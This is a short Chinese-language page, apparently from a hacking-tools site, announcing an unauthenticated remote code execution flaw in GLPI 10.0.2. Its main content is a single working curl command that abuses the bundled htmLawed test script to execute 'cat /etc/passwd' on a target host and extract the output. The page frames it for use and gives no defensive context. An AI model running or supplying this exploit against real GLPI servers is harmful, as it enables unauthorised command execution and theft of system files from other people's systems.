黑客、渗透测试和网络安全工具,武装您的安全武器库!
未认证的 GLPI 10.0.2 远程代码执行漏洞
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
GLPI 10.0.2 中无需身份验证的远程代码执行
curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' http://{{HOST}}/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'